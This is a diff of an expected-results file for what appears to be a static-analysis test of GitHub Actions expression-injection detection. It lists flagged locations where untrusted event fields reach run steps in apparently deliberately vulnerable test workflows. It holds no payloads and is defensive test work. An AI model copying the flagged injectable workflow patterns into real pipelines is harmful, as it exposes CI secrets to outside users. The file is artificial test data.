.github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | github.event.comment.body | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | env.pr_message | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | github.event.pages[2222].page_name | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | steps.trim-url.outputs.trimmed_url | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | env.step_env | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | 